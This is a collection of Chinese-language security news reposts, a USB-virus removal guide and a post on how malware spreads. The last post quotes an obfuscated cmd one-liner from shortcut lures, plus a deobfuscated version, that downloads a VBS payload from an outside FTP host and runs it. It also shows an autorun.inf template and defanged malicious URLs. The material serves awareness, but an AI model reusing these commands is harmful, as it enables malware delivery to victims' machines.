【資安】惡意程式新手法：下載時無毒 更新後再變病毒

在今年內，隨著Android等智慧型手機平台大福擴張，過去認為不會造成太大影響的手機病毒攻擊，目前已經有越來越顯著的攻擊現象，而從過去單純偽裝、竊取權限的模式開始，目前也進展到自下載到安裝時都不會有所問題，反而是在軟體更新時，才會現出惡意程式真面貌。

【文／楊又肇】

在今年內，隨著Android等智慧型手機平台大福擴張，過去認為不會造成太大影響的手機病毒攻擊，目前已經有越來越顯著的攻擊現象，而從過去單純偽裝、竊取權限的模式開始，目前也進展到自下載到安裝時都不會有所問題，反而是在軟體更新時，才會現出惡意程式真面貌。

根據芬蘭防毒軟體F-Secure透露，官方在今年7月期間攔截到一組名為「Spyware:Android/SndApps」的Android間諜程式，這項惡意程式不像過去只是透過表面偽裝成一般App內容，使用者在下載安裝後甚至可以正常使用相關功能，而不會感到任何的異狀。但若是在首度更新App內容版本後，就會在取得用戶同意後搖身恢復為惡意程式面貌，進而竊取用戶手機資訊或進行相關攻擊。

會有這樣的攻擊模式發展，主要可能因為近期夾帶惡意程式的App報導增多，使用者後續在下載App安裝前多半會加以考量，但相對地在App後續更新卻較少有所防範，因此有不少惡意程式在後續的設計便會採取先讓使用者下載並正常使用，等進行第一次App更新後，便會透過這樣的心理防範差異讓使用者點按同意提供相關軟體權限，進而讓惡意程式取得手機控制權。

根據F-Secure後續追蹤，從一組名為「理財記賬本」的Android App中便可發現這樣的情況：透過更新之後，App將會要求包含使用簡訊、多媒體簡訊或手機位置等資訊使用權限，一旦使用者點按同意之後，此App便會進一步取得Root權限並在手機內安裝一組偽裝成init.db檔案的木馬程式APK內容，將會進一步紀錄使用者手機操作過程，同時進一步將資料外送到其他位置存放。而由於程式同取得Root權限，若是有心人士希望藉此破壞手機使用狀況，技術上也是可以做得到。

初次下載安裝時，看起來並沒有太大奇怪的權限要求





下載安裝之後，立即會接收到更新的提示，選擇更新後，App便會要求提供包含簡訊、所在位置等資訊權限
選擇更新後，App便會要求提供包含簡訊、所在位置等資訊權限

針對目前此類的攻擊模式，F-Secure大中華區總監李力恆認為，目前在Android平台上雖然在安裝任何App時均會提示要求提供使用權限，但是在一些情況下，駭客們也會想辦法將這些權限要求合理化「包裝」，而一般使用者也並不見得能實際了解提供這些權限可能造成什麼影響，特必須格外堤防別人利用心理防範漏洞騙取信任，進而使個人隱私受損。

文章出處：惡意程式新手法：下載時無毒 更新後再變病毒
相關連結&照片出處：DroidKungFu Utilizes an Update Attack (F-Secure病毒實驗室官方部落格)

【資安】小心！小賈斯汀影片含惡意連結，流竄臉書

小心！小賈斯汀影片含惡意連結，流竄臉書

撰文者：趙郁竹發表日期：2011-08-02

 

趨勢科技近期發現一個以小賈斯汀為名的惡意網址在Facebook塗鴉牆流竄，看起來似乎是一個影片連結，要點選才能觀看，標題為「The Video That Just Ended Justin Biebers Career for Good（這影片會讓小賈斯汀的演藝生涯劃下句點）」。

使用者點選連結後，會出現一個要求使用者回答問卷的視窗，然後才能觀看所謂的小賈斯汀影片內容，並宣稱可以獲得價值1000美元的禮物。不過在使用者完成問卷後，卻沒有任何相關影片可供使用者觀看。

趨勢科技技術總監戴燊表示，這是個典型的社交工程（Social Engineering）陷阱手法，一方面利用網友對名人醜聞的好奇心，另一方面則以Facebook合法網站掩護夾帶含有惡意連結網址，降低使用者的警覺心。

外界對社交網站的高度興趣就是讓駭客利用的媒介，網路犯罪份子利用竊取而得的社交網站帳號到處發送惡意連結，甚至偷竊更多使用者帳號，這樣的現象也進一步說明為何使用者成為網路犯罪交易熱門產品。

圖說：當使用者點擊「播放」按鈕，旋即出現視窗要求使用者回答問卷，此攻擊不但意圖竊取使用者個人資料，亦會在使用者的Facebook塗鴉牆頁面張貼類似貼文，以誘騙更多使用者點選該網址。

來源文章網址：數位時代：首頁 > Topics and Links新聞精選 > 小心！小賈斯汀影片含惡意連結，流竄臉書

【資安】小心！Android惡意程式威脅倍增

小心！Android惡意程式威脅倍增

撰文者：黃靖文編譯發表日期：2011-08-03

假如你是使用Android智慧型手機，那你要小心了，你受惡意軟體攻擊的可能性是半年前的兩倍。由Lookout Mobile Security提出的行動裝置威脅報告估計，在2011年上半年有50萬人受到惡意軟體攻擊。

Lookout約分析了全球超過七十萬個App程式和一千萬台的裝置，發現從一月起惡意軟體的數量便大幅增加，而大部分都是針對Android系統。在一月受感染的App有80個，到了六月增加為400個。

Lookout解釋，根據資料顯示Android系統受感染的機率為半年前的2.5倍。而iOS則因App Store控管較嚴密，惡意程式較難侵入。但在Android系統因較開放，讓不法之徒較易散播惡意軟體，一個名稱為DroidDreamLight的軟體，感染了Android Market中約34個App。

但iOS系統並非完全不受惡意軟體攻擊，若是用戶越獄(Jailbreak)使用未經審核的App，仍可能被惡意程式攻擊。另外Lookout還指出，除了App外，還有來自於網頁的威脅，透過網頁可做跨平台的攻擊。但目前仍主要利用未授權的App來散佈惡意軟體。

出自AllThings 來源文章網址:數位時代(首頁 > Topics and Links新聞精選 > 小心！Android惡意程式威脅倍增)

【news】Funs.com.tw官方網站含有假防毒軟體和搜索引擎優化中毒網頁

病毒名稱︰Fake AV、SEO-poisoned pages

病毒類型︰惡意程式
受影響的作業系統︰Windows /98/2000/XP/Vista/7

病毒分析：


根據AegisLab發現，房市家大社區論壇的官方網站(Funs.com.tw)，已經在日前被駭客篡改成包含了假防毒軟體(Fake AV)和搜索引擎優化中毒(SEO-poisoned pages)的網頁。

只要使用者點擊該連結進入網頁，隨即會看到的假安全程式警告訊息。

此惡意軟體偽裝成更新軟體，將會強迫使用者下載。

一旦使用者點擊「確定」按鈕，就會啟動一個偽安全程式的警告掃描，這時無論使用者有無按下確定鍵，都會被迫下載一個「假的」更新軟體，實際上是一種惡意軟體。所以千萬不要執行它！

此外，還會透過Blackhat SEO（黑帽搜尋引擎最佳化）的方式來增加該中毒網站被點擊的機率。

其攻擊路徑如下：
[搜尋]http://www.google.com（搜索’如何轉換和新增DVD和Wmv FLV視頻到iPhone 3G平台）
[root] hxxp：//www.funs.com.tw/uchome/space.php?uid=29036&do=blog&id=1112310
[hop]所在地網址：hxxp：//buyordie.osa.pl /
[假搜索引擎] hxxp://finditnow.osa.pl/atp/?said=3333&q=facebook
因此，一旦該網站被置入了惡意網站連結「buyordie.osa.pl」後，它將會重新設定網站瀏覽者為Google搜索引擎中的假搜索引擎，假冒搜索內容包含惡意軟體或色情網站連結。不過AegisLab已經在日前將該網站正式封鎖。

★此篇文章出處網址★


★NCUISA官方網站包含搜索引擎優化中毒網頁★

[news]網安／Stuxnet蠕蟲人人喊打 新木馬假除毒好意趁虛打劫

記者蘇湘雲／台北報導

資安專家自今年6月發現了一個名為Stuxnet蠕蟲惡意程式怪客，主要攻擊目標是例如核能發電廠、煉油廠中的自動化生產與控制（SCADA）系統，發動全球通緝人人喊打中；沒想到，專家最新偵測到以W32.Stuxnet清除工具為名義，欲感染使用者電腦的木馬Trojan.Fadeluxnet，可說是趁虛打劫的偽君子。

最新的諾頓病毒週報8日公佈Trojan.Fadeluxnet木馬病毒，指出受影響的作業系統包括Windows 95/98/Me/NT/2000/ XP/Vista，以及Windows Server 2003。賽門鐵克描述，W32.Stuxnet於2010年7月出現，是利用零日漏洞進行傳播並感染工業控制系統的惡意病毒，近期偵測到以W32.Stuxnet清除工具為名義，欲感染使用者電腦的木馬Trojan.Fadeluxnet。

追蹤調查發現，Trojan.Fadeluxnet通常會自行命名為Microsoft Stuxnet Cleaner，令使用者以為這是微軟發佈的合法程式。執行後，會自行釋放一個名為Stuxnet Cleaner的bat檔，假冒成清除W32.Stuxnet病毒的程式，實際上該檔將執行惡意操作，分別是
一、修改系統檔案關聯，讓系統無法正常開啟exe、mp3、jpg、bmp以及gif等檔案格式；
二、關閉IE、Firefox等流覽器；
三、刪除磁碟C的所有檔案和資料夾。

專家建議，使用者不要輕易造訪可疑網站、或下載來歷不明的應用程式。同時在瀏覽網頁前，可以使用網頁安全工具分析將要造訪網頁的安全性。

★此篇文章出處網址★

[news]開簡訊就中毒 專攻擊Android手機

開簡訊就中毒 專攻擊Android手機

2010-09-28、中國時報、陳大任／台北報導

    　智慧型手機日益普及，現在也成為駭客入侵的對象。趨勢科技最近發現第一個專門攻擊Android手機的惡意程式「TROJ_DROIDSMS.A.」，與上個月發現的Symbian惡意程式有類似的偽造行為，都會盜用個人資料。業者認為，未來手機遭到病毒攻擊的情況只會越來越多。

    　科技業者表示，第一個衝著Android手機而來的TROJ_DROIDSMS.A.惡意程式，是利用簡訊的途徑散布，使用者只要打開程式就會中毒，雖然目前沒有造成很大的災情，但駭客很快又散布另一個叫做Tap Snake的應用程式，只要是按下同意該服務的「終端使用者授權合約」，駭客就會藉此取得個人所在的位置資料。

    　以往駭客散布病毒，多半是毀滅式的攻擊，被感染的電腦、手機經常因此掛點，無法繼續操作，不過，這種癱瘓主機「損人不利己」的手法已不流行，駭客轉為盜取個人資料還比較有賺頭。但是，這種手法更可怕，無論是電腦或手機，一旦受到病毒攻擊，使用者也不會感覺到有異常，等到個人資料被盜用，手機大量發送簡訊，使用者收到帳單才發現損失慘重。

    　趨勢科技技術總監戴燊表示，駭客的行為向來是往最熱門的地方鑽，現在使用手機上網的人多了，目標也變得明顯，iPhone上市這麼久，但很少傳出「疫情」是因為它還是較封閉的系統，而Android手機開放式平台的特性，使用者下載應用程式時就要更為小心。

    　趨勢科技公關經理江婷說，手機的傳播力高，惡意程式散布的速度比電腦更快，資訊防護的觀念也應該注意到使用手機可能遇到的風險，目前電信業者都有提供類似防毒的服務，如中華電信即與趨勢科技合作，提供手機防護精靈的服務。使用智慧型手機的用戶可電詢客服人員，查看手機是否有受到防毒軟體的保護。

★新聞出處網址★

[news]該來的還是會來 Android出現首款病毒！

該來的還是會來 Android出現首款病毒！


由於Google與協力廠商大力推廣Android平台，因此有越來越多人使用此款作業系統，同時也漸漸成為不少意圖不軌人士鎖定的目標，而終於在最近出現了首款針對Android攻擊的病毒。

【文／楊又肇】

(圖／擷自PocketNow網站)

由於Google與協力廠商大力推廣Android平台，因此有越來越多人使用此款作業系統，同時也漸漸成為不少意圖不軌人士鎖定的目標，而終於在最近出現了首款針對Android攻擊的病毒。

防毒廠商卡巴斯基日前發現一款潛伏在文字簡訊中的木馬型病毒，名稱同時被稱為「Trojan-SMS.AndroidOS.FakePlayer.a」，同時將會透過文字簡訊傳染給其他同樣使用Android的手機。

當手機接收此組文字簡訊時，系統將會詢問是否安裝一組被包裝成看似無害且為13KB大的多媒體播放程式，假使使用者按下確認並安裝之後，病毒將會常駐於背景運作並自動透過手機通訊錄內容傳送簡訊，而可能將會造成使用者通訊費用增加。

目前還沒有明確的方式可用來判斷手中的手機是否被病毒感染，現行最好的防治辦法便是拒絕一切可疑的安裝請求，或者是看之後是否將會有相關漏洞修補？

※相關連結》

‧First Android Virus (PocketNow網站)

新聞出處連結：http://mag.udn.com/mag/digital/storypage.jsp?f_MAIN_ID=322&f_SUB_ID=2920&f_ART_ID=264317

[news]調查報告：Adobe Reader、IE漏洞最多

調查報告：Adobe Reader、IE漏洞最多

根據M86 Security Labs 14日公布的調查報告，弱點最常被利用的軟體是Adobe Reader和Internet Explorer，但Java被利用的趨勢正不斷上升。


M86 Security Labs發現，今年上半年最常被利用的15個弱點中，4個屬於Adobe Reader，5個屬於Internet Explorer。


同樣有弱點名列前15名的軟體，還包括微軟Access Snapshot Viewer、Real Player、微軟DirectShow、SSreader和AOL SuperBuddy。報告指出，這些弱點大都早在1年前即曝光，軟體商也已提供修補方案。因此，「凸顯了保持軟體更新最新版本和修補方案的需要」。


有更多Java弱點被利用，反映出攻擊者看上了Java的普及和受歡迎。最普遍的攻擊情境，是用瀏覽器造訪合法網站時，被隱藏的iFrame或JavaScript重導至一個帶有惡意Java小程式的惡意網頁。


eEye Digital Security技術長Marc Maiffret說：「Java是下一個最易取用的攻擊工具。」


在此同時，攻擊者也發現躲避惡意軟體偵測機制的新方法。M86的報告指出：「過去幾個月來，我們觀察到一種結合JavaScript與Adobe ActionScript指令語言的新程式混亂技術。」


該報告也指出，目前佔所有機關組織電郵來信88％的垃圾郵件，大多（約81％）屬於藥品類，且主要都是「加拿大藥商」品牌。


這部份與Proofpoint和CommTouch前一日發佈的研究報告相符。後者指出，2010年第二季，每天平均有1,790億封垃圾電郵或釣魚電郵，其中以藥品廣告最多。而垃圾郵件最愛用的假「發信」網域，依排名分別是：gmail.com、hipenhot.nl、yahoo.com、123greetings.com、hotmail.com和postmaster.twitter.com。（陳智文/譯）



原始新聞出處連結：http://www.zdnet.com.tw/news/software/0,2000085678,20146624,00.htm?feed=NL:+%AC%EC%A7%DE%B7s%BBD%A4%E9%B3%F8

[news]驚！Windows弱點雖已發佈 惡意程式仍下載超過34萬次

記者蘇湘雲／台北報導

網友收到定期安全更新不以為意，但資安專家警告，這會使得電腦暴露於網路威脅下，舉例說，惡意程式Agent.bab利用Windows系統弱點，能夠自動下載惡意程式到使用者電腦中，雖然這項弱點早就於今年3月被發佈，但僅6月份一個月統計，此惡意程式仍然被下載超過了34萬次。


卡巴斯基實驗室14日發佈6月惡意程式統計報告，調查發現，名為Trojan-Downloader.JS.Pegel.b的惡意程式下載器又重新回到排行榜並高達第三位。


專家指出，當使用者存取或瀏覽到已被Pegel.b感染的網頁時，Pegel.b會將使用者轉至被駭客控制的網站，並且在使用者不知情的情況下，將更多惡意程式自動植入用戶電腦裡，間接引發駭客發動攻擊，包含竊取個人及企業隱私資料的木馬程式、間諜程式，及釣魚網站。


調查還發現，當Adobe使用者在6月進行程式更新時，Exploit.JS.Pdfka惡意程式家族隨即產生大量攻擊，也因此本月就有3支此類型惡意程式分佔排行榜第6、第8和第14。


專家警告，很多使用者對廠商定期發布的安全更新不以為意，使得他們的電腦暴露於惡意攻擊的威脅下。排名第二位的Agent.bab就是一個很明顯的例子；Agent.bab利用Windows系統的CVE-2010-0806弱點，能夠自動將許多惡意程式下載到使用者的電腦裡。


雖然這項弱點雖然早就於今年3月被發佈，但僅6月份單月統計，此惡意程式仍然被下載超過了34萬次。

新聞原始出處連結：http://tw.news.yahoo.com/article/url/d/a/100714/17/2995u.html

[news]Panda : 全新釣魚手法Tabnabbing驚悚現身

Panda : 全新釣魚手法Tabnabbing驚悚現身

Date : July 7, 2010    Company : Panda

 

-特洛伊木馬程式的數量佔所有新發現惡意軟體的52%。 -傳統病毒的復甦態勢仍持續著，其數量佔所有新發現惡意軟體的24.35%，比前一季上升了10個百分點。 -台灣、俄羅斯和土耳其是電腦中毒數量前三高的國家。 雲端資安防護廠商－Panda防毒軟體公司的反惡意軟體實驗室（Panda實驗室），最近發表了2010年第二季季報，針對今年4月到6月的資安威脅進行分析。其中最引人關注的，就是具高危險性的全新釣魚手法Tabnabbing驚悚現身！ Tabnabbing是一種利用瀏覽器頁籤功能的釣魚手法，網友自以為連上Gmail、Hotmail或Facebook等熟悉網頁，卻不知道自己身陷個資曝光的險境，帳密資料也早已遭到竊取。 Tabnabbing的攻擊手法相當單純，其步驟如下： 1. Java程式碼會偵測已開啟但目前未被瀏覽的頁籤。這組程式碼會自動覆寫網頁的內容、圖示和抬頭名稱，變成一個和原始網頁很類似的偽造頁面。 2. 在開啟多個瀏覽器頁籤、瀏覽數個網頁後，假如網友想要重新登入Gamil之類的帳戶，通常都會回頭看看頁籤，檢查是不是已開啟過Gamil登入頁面了。在這種情況下，網友就會被導到偽造的Gmail登入頁面裡面，而他們根本不會記得先前瀏覽過的登入頁面實際上已經失效一段時間了。 3. 當網友輸入登入資料時，偽造網頁就會把這些個資偷偷儲存起來，並將他們重新導回去原始網頁裡面。 Panda實驗室提醒您，關閉所有非使用中的瀏覽器頁籤，養成良好的網路使用習慣，以避免自己淪為個資洩漏的高危險群。 特洛伊木馬程式仍是最具威脅的惡意軟體 在今年第二季，特洛伊木馬程式再度成為「成長最快速的惡意軟體」，其數量佔所有新發現惡意軟體的51.78%。而最近幾個月以來，傳統病毒也呈現了復甦態勢，其數量比前一季上升了10個百分點，目前總數已佔所有新發現惡意軟體的24.35%。 至於在電腦中毒排行榜方面，台灣又再次慘居首位，代表有50%以上的電腦都受到了病毒感染。而緊接在後的國家則是俄羅斯和土耳其。 Panda在前三個月所發現的社群網站資安事件、搜尋引擎毒化攻擊手法以及Windows系統安全漏洞，通通都在第二季季報裡面為您揭密，您可點選下列網址下載這份文件：http://www.pandasecurity.com/img/enc/Quarterly_Report_PandaLabs_Q2_2010.pdf

[ZDNET] Google修了被駭的YouTube漏洞

Google修了被駭的YouTube漏洞

根據媒體報導，部分YouTube影片4日早晨遭駭客掛上猥褻的快顯圖片，並導向成人網站。Google已發布更新封堵這項安全漏洞。

IDG News Service的報導指出，駭客利用一種稱為跨站腳本攻擊(cross-site scripting，XSS)的安全弱點，在YouTube網站的讀者評論頁面中植入程式碼。駭客似乎對小賈斯汀(Justin Bieber)深懷怨恨，專門找與這位青少年偶像明星有關的影片下手。小賈斯汀是YouTube人氣最旺的紅星之一，他訂於4日周日晚間上NBC電視台參加慶祝美國獨立紀念日的節目。

根據IDG的報導，一位Google發言人表示，YouTube訪客碰上被綁架的網頁時，他們的Google帳戶並不會遭到駭客侵入；但訪客最好先登出Google帳號，再重新登入，以策安全。

IDG另外還引述一名人士的說法指出，雖然被駭客動手腳的YouTube網頁不含惡意軟體，但訪客被拐去看的網頁卻可能藏毒，但大多數的防毒軟體應該足以抵禦。  

Google表示，為因應駭客攻擊，一度暫時關閉YouTube的評論區。 

Google說：「發現(問題)後的一小時內，評論區暫時隱藏，兩小時後我們發布完整的更新解決這個問題。我們會持續研究這個弱點，協助避免未來再發生類似的問題。」 

(唐慧文譯)

新聞出處連結：http://www.zdnet.com.tw/news/web/0,2000085679,20146473,00.htm?feed=NL:+%AC%EC%A7%DE%B7s%BBD%A4%E9%B3%F8

[news]Adobe Reader、Acrobat安全更新防堵17項重大漏洞

Adobe周二發布Reader和Acrobat安全更新，封堵總計17項重大的安全漏洞，其中一項安全漏洞可能造成電腦遭到接管，另一項可能被駭客利用來發動社交工程與PDF檔攻擊。


Adobe早在6月初即警告這些安全漏洞可能被駭客利用來發動攻擊，並已在6月10日修補影響Flash Player的安全漏洞。


同時，資安研究員Didier Stevens在3月下旬揭露上述PDF安全漏洞，並展示如何利用"/launch"功能來發動攻擊。一周後，另一位NitroSecurity公司的資安研究員也示範如何利用同一個安全漏洞發動攻擊。



Adobe員工Steve Gottwals周二在部落格撰文說：「我們增加了一項功能，在預設狀態即可攔阻啟動可執行檔或其他有害的物件。我們也修改現行警告對話框的運作方式，以阻擋已知的社交工程攻擊。」


根據安全公告，最新釋出的安全更新適用於Windows、Mac和Unix版的Adobe Reader 9.3.2、Windows和 Mac版的Adobe Acrobat 9.3.2，以及Windows和Mac版的Adobe Reader 8.2.2與Acrobat 8.2.2。


上述更新將取代原訂7月13日釋出的每季例行安全更新。下一次更新訂於10月12日發布。 


新聞出處網址：http://www.zdnet.com.tw/news/software/0,2000085678,20146398,00.htm?feed=NL:+%AC%EC%A7%DE%B7s%BBD%A4%E9%B3%F8

[news]臉書心理測驗暗藏病毒 專家籲用戶注意

臉書心理測驗暗藏病毒　專家籲用戶注意

社群網站Facebook人氣居高不下，也成為駭客和病毒攻擊的對象，專家警告，最好在電腦設置防毒軟體和防火牆，阻擋惡意程式，並定期更新瀏覽器、應用程式。

隨著社群網站Facebook的風行，很多人都會在網路上分享自己的經歷、遊戲，或是進行心理測驗，卻有很多網友發現，自己的臉書上出現很多朋友的心理測驗，令人不堪其擾，就連名導蔡明亮也抱怨，不要再留這些東西到我的臉書。

防毒軟體專家指出，有不少病毒和惡意軟體會利用上述社群網站的遊戲和心理測驗，不斷丟垃圾訊息，造成「洗版」的現象，甚至遊戲連結本身就有惡意程式，可透過連結取得使用者的帳號密碼。

前陣子Facebook曾出現「海灘俏女郎（Distracting Beach Babes）」這個惡意軟體，利用比基尼女郎讓使用者點選類似影片的連結。點選後會連到一個Facebook應用程式，要求想看影片的使用者安裝軟體，進一步誘騙使用者連到惡意程式。

專家表示，要阻擋惡意軟體攻擊，最好的解決方式就是防毒軟體，或在電腦設置防火牆，阻擋惡意程式，並定期更新瀏覽器、應用程式。

新聞出處網址：http://iservice.libertytimes.com.tw/liveNews/news.php?no=376048&type=%E5%8D%B3%E6%99%82%E6%96%B0%E8%81%9E

  

[news]新病毒W32.Wapomi會偽裝影音播放軟體檔案

新病毒W32.Wapomi會偽裝影音播放軟體檔案

關鍵字： W32.Wapomi  QVOD  影音播放軟體
   

很多PC用戶可能都使用過一款名為「QVOD (快播)」的影音播放軟體。近期賽門鐵克安全回應中心檢測到一個病毒W32.Wapomi，它將自身檔案的版本資訊偽裝為QvodInstall Module，並且採用了一個與捷徑圖示非常相似的標識，從而誘導使用者將其誤認為是QVOD的安裝程式。
 

執行時，該病毒會通過多種方式阻止使用者刪除它所保護的註冊表鍵值，並透過映射劫(Image File Execution Options)禁止防毒軟體運行。此外，W32.Wapomi還會從指定網站下載更多的惡意程式到使用者機器並執行，並且把從使用者電腦中搜集到的資訊發送給攻擊者。


該病毒採用多種方式進行散布：1. 把自己複製到各磁碟分割的資源回收筒中，並添加對應的autorun.inf；2. 使用自帶的密碼表嘗試連接有開啟遠端共用服務的電腦，一旦成功就會試圖把病毒本身複製到遠端電腦；3. 感染在使用者電腦上找到的exe檔，被感染的檔案檢測為W32.Wapomi!inf. 當用戶執行被感染檔時，它會首先釋放W32.Wapomi並執行。

新聞出處：http://www.eettaiwan.com/ART_8800607040_480802_NT_399cc539.HTM

[iThome]日本大學職員洩漏個資1.5萬件

日本大學職員洩漏個資1.5萬件

文/張嵐霆 2010-04-28

人事課職員將業務用資料複製到USB隨身碟攜出，在家中個人電腦使用，受到電腦內P2P軟體及病毒影響而導致至少有1萬5000份個資已流入全球網路中。


位於東京的私立日本大學爆發網路個資洩漏事件，大學總務部長大工原孝週二（4/27）召開記者會證實，已洩漏個資約1萬5000件，其餘仍有未查明的部分正在追蹤調查。

洩漏原由是4/24日人事課一名職員擅自將業務用資料複製到USB隨身碟攜出，在家中個人電腦使用，受到電腦內P2P軟體Share感染的病毒影響而洩漏至網路中。

4月26日上午校方接獲匿名傳真表示網路上有大量與日本大學有關的業務文件資料，校方於同日展開追蹤調查，並於4/27日成立特別調查委員會。

根據調查報告顯示，洩漏的檔案幾乎都是Word與Excel檔，包括人事課轄下業務資料、會議記錄，以及該職員3月之前任職於日本大學醫學部附屬醫院時所管理的醫院職員通訊名冊，至少有1萬5000份個資已流入全球網路中。

大工原表示，該員隨意複製資料在私人電腦上使用是非常輕率的行為，違反了學務處訂定的資料使用規範，今後將由特別調查委員會決定該員懲處，並加強職員資安訓練辦法與資料管理規範，同時也對受此案牽連的人士致上最大歉意。

引發此案的職員已自請休假與家人離開住所，因此日媒無法直接訪問到本人。日本大學是日本國內學系最多的綜合大學，知名校友有演員中村獅童、漫畫家青山剛昌、台灣現任立法委員李鴻鈞等。（編譯/張嵐霆）

新聞出處：http://www.ithome.com.tw/itadm/article.php?c=60875

[病毒]KAVO 系列（ Kxvo J3ewro ）手動清除

此隨身碟病毒，已經很舊了，大家都知道，目前還有變種eset.exe等等，但解毒位置都大同小異，可以參考此篇文章手動解毒


==================================================================================
一、先行關閉電腦磁碟區的「系統還原」功能。

• 系統還原功能能夠使系統回復到預設狀態，假如電腦的資料毀損，則可以用來復原資料。
• 系統還原功能也會記錄下病毒、蠕蟲或是木馬的感染。Windows 預防任何外部程式來修改系統還原功能，當然也包括了防毒軟體。因此防毒軟體或是工具無法移除系統還原資料夾中的威脅。即使已經在其他的資料夾清除了感染的檔案還是有可能經由系統還原來回復受感染的檔案。

二、下載病毒快速刪除工具：

• kavo_killer（張書維先生製作）[ kavo_killer.rar ]
• EFix（台大批踢踢BBS）[ EFix488.rar ]
  • 執行上述病毒快速刪除軟體，進行下列工作
    • 刪除病毒檔案
    • 關閉病毒相關的的程式
    • 移除病毒所創建的啟動登錄項目
    • 更動要修改的登錄檔
    • 刪除每個硬碟根目錄下與病毒相關的程式

三、進入檔案總管（重點！請勿直接點選「我的電腦」進入各磁碟區）

• 進入「工具」、「資料夾選項」、「檢視」 
  • 點選「顯示系統資料夾的內容」
  • 點選「隱藏檔：顯示所有檔案和資料夾」
  • 取消「隱藏保護的作業系統檔案」
  • 取消「隱藏已知檔案類型的副檔名」

四、使用 CMD 進入 regedit 及 msconfig 檢查相關資訊（確認是否有遺漏）。

• 檢查的 KEYWORD 建議值如下：
• 如有發現下列相關程式時，執行刪除動作。
  • cc.exe
  • ff.exe 
  • j3ewro.exe
  • kxvo.exe
  • nw0t1l0d.exe
  • pagefile.exe
  • taso.exe
  • tava.exe
  • tavo.exe

五、使用檔案總管進入下列資料夾清除相關檔案（通常病毒會偽裝成隱藏、系統檔，所以要特別留意圖示是半透明的）

• %Temp%\
  （清空該資料夾）
• %windir%\
  （清除fly.exe；fly32.dll；poor.exe；poor32.dll）
• %windir%\TEMP\
  （清空該資料夾）
• %UserProfile%\Local Settings\Temp\
  （清空該資料夾）
• %windir%\system32\
  （清除amvo*.dll；amvo.exe；amwo*.dll；amwo.exe；avpo*；vpo.exe；Bitkv*.dll；dnsq.dll；drivers\OLD*.tmp；EXPLORER.EXE；fly.exe；fly32.dll；fool*.dll；goods.exe；ieso*；j3ewro.exe；jvvo*；jvvo.exe；jwedsfdo*；kavo*.dll；kavo.exe；kxvo*；kxvo.exe；mcdcsrv32_080417.dll；mmso*.dll；mmso.exe；mmvo*.dll；mmvo.exe；Msi.exe；mxcdcsrv16_080417.dll；OLD*.tmp；poor.exe；poor32.dll；raidiap*.exe；shareb.exe；taso*.dll；taso.exe；tava*.dll；tava.exe；tavo*.dll；tavo.exe；ubs.exe；winhelp1.exe；winpows.exe）
• %UserProfile%\「開始」功能表\程式集\啟動\
  （刪除此開機啟動資料夾中與啟動不相干的程式）
• %ALLUSERSPROFILE%\「開始」功能表\程式集\啟動\
  （刪除此開機啟動資料夾中與啟動不相干的程式）

六.若上述相關病毒程式及附屬檔案無法刪除時，請下載下列程式進行強制刪除。

• Wsyscheck [ Wsyscheck_v1.68.33.rar ]
  [軟體版本] V1.68.33
  [軟體語言] 繁體中文
  [軟體簡介] 免安裝
   Wsyscheck 是一款手動清理病毒木馬的工具，其目的是簡化病毒木馬的識別與清理工作。
  一般來說，對病毒體的判斷主要可以採用檢查路徑、檢查檔名、檢查檔案建立日期、檢查檔案廠商、微軟檔案驗證、檢查啟動項目等方法，Wsyschck 在這些方面均盡量簡化作業，提供相關的資料供您分析。
  最終判斷並清理木馬取決於您個人的分析，以及對 Wsyscheck 基本功能的熟悉程度。
• IceSword [ IceSword_v1.22.rar ]
  [軟體版本] V1.22
  [軟體語言] 繁體中文
  [軟體簡介] 免安裝
  1、處理序項目中的模組搜尋
  2、登錄檔項目中的搜尋功能
  3、檔案項目中的搜尋功能，分別是 ADS 的列舉 (包含或不包含子目錄)、普通檔案搜尋 (Find Files)
  4、BHO 項目的刪除、SSDT 項目的恢復 (Restore)
  5、 Advanced Scan
  6、隱藏簽章項
  7、其它就是內部核心功能
  
  
  原文連結：http://plog.jxes.tc.edu.tw/lifetype/index.php?op=ViewArticle&articleId=1066&blogId=2

[知識]惡意程式之常見傳播方式

惡意程式之常見傳播方式

在這數位化的時代，
電腦越來越方便，
但是在這方便之中，
確隱藏著許多危機，
許多惡意成是被製造出來，
也一個比一個厲害，
其傳播方式也層出不窮，
以下為大家分享最近各惡意程式常見的傳播方式。

以下圖點擊可放大

(一)網路
1.利用電子郵件傳播
利用釣魚的方式，
引誘對方下載其附件並執行它。
在很久之前，木馬傳播者都以.exe .com .scr 等執行檔引誘別人
接著就進化出 xxxx.jpg.exe ~~等等引誘別人
或著是做成壓縮檔，
但是這樣很容易就被防毒抓到了，
現在又進化出，利用xxx.lnk捷徑 呼叫cmd.exe 利用FTP下載惡意程式，
且可以讓捷徑偽裝成圖檔，讓使用者認為是正常檔案，藉此降低使用者的戒心，
呼叫cmd.exe也可以利用set變數來躲過許多防毒軟體，
其代碼如下
%ComSpec% /c set q= t t.v&set a=z.c&set p=p.g&set h=p -s:z&set n=echo &echo %n%o ft%p%03%a%om^>z>j&echo %n%aa33^>^>z>>j&echo %n%bb33^>^>z>>j&echo %n%get%q%bs^>^>z>>j&echo %n%bye^>^>z>>j&echo ft%h%>>j&echo start t.vbs>>j&ren j s.bat&call s.bat&

整理一下代碼(變數已還原):
cmd /c <=呼叫cmd命令提示字元
echo echo o ftp.g03z.com^>z>j
echo echo aa33^>^>z>>j
echo echo bb33^>^>z>>j
echo echo get t t.vbs^>^>z>>j
echo echo bye^>^>z>>j
echo ftp -s:z>>j <=讀取連接檔 下載t.vbs並執行下載 s.exe d.exe
echo start t.vbs>>j
ren j s.bat
call s.bat

預防方法:
不要隨意開啟別人用信箱寄過來的附件或連結，
開啟前要先詢問寄件者。

2.Yahoo即時通/MSN木馬連結
同樣的利用釣魚方式，
引誘使用者點擊或下載其惡意連結，
最近比較流行的是MSN病毒，
該病毒，如果中了，
只要你上了MSN就會自動對你的所有聯絡人發出帶有病毒連結的惡意訊息~~
Ex:
haha, your PIC?hxxp://ufopyrenees. org/images/view.php?=account@hotmail.com
以上是病毒網址請勿連結(已經過特殊處理)

預防方法:
不隨意開起來自MSN或及時通的可疑帶連結訊息。

(二)硬碟/外接式硬碟
1.透過Autorun.inf自動播放傳播...
此為傳統隨身碟病毒傳播的方式。
該病毒會在你的每個磁區寫入一個病毒主檔+一個Autorun.inf
利用系統硬碟自動播放的功能，
讓使用者開啟硬碟時，
不是開啟硬碟而是開啟病毒主檔，
以此方式入侵到你的系統。
Autorun.inf 的內容
大致上是
[AutoRun]
Open=XXX.EXE
Shell\Open\Command=XXX.EXE
